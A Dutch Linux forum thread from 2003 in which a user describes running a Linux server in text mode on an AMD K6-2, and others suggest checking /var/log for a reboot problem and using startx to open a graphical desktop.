Nee het is een AMD K6-2 375/400 MHz staat nu op 375.. maar hij kan op 400 .. alleen dan wordt ie onstabiel.. dus hij kan het aan.. en x (kde) heeft erop gestaan.. alleen voor server draaien is dit niet nodig.. en het is zo dat als je meteen met x begin dat je nooit linux helemaal leert kennen. vandaar begin ik met text..

Maar iemand al een antwoord op de server reboot vraag?

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

woensdag 26 maart 2003 19:32

Acties:

LollieStick

Check je log eens: /var/log

ps. kan je beter hier een nieuw draadje over openen.

[ Voor 51% gewijzigd door LollieStick op 26-03-2003 19:33 ]

woensdag 26 maart 2003 20:07

Acties:

Robtimus

me Robtimus no like you

Looki schreef op 26 maart 2003 @ 19:23:
alleen voor server draaien is dit niet nodig.. en het is zo dat als je meteen met x begin dat je nooit linux helemaal leert kennen. vandaar begin ik met text..

Niet nodig, maar het kan wel handig zijn met sommige GUI frontends. Verder start zelfs mijn gewone - niet server - PC op in text mode. Als ik een grafische omgeving wil/nodig heb bestaat er dan een magisch commando: startx

More than meets the eye
There is no I in TEAM... but there is ME
system specs

Pagina: 1

Reageer